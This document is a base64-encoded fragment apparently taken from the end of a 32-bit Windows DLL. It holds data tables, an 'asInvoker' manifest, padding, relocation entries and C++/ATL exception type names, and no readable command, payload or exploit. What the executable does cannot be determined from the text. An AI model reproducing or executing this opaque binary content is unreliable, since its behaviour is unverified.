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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA